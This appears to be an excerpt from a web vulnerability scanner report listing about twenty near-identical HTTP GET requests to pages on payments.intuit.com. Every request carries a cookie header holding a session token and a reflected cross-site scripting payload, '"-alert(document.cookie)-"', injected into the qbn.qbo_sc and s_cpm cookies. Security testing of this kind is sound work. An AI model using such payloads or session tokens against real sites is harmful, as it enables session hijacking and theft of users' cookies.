Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; 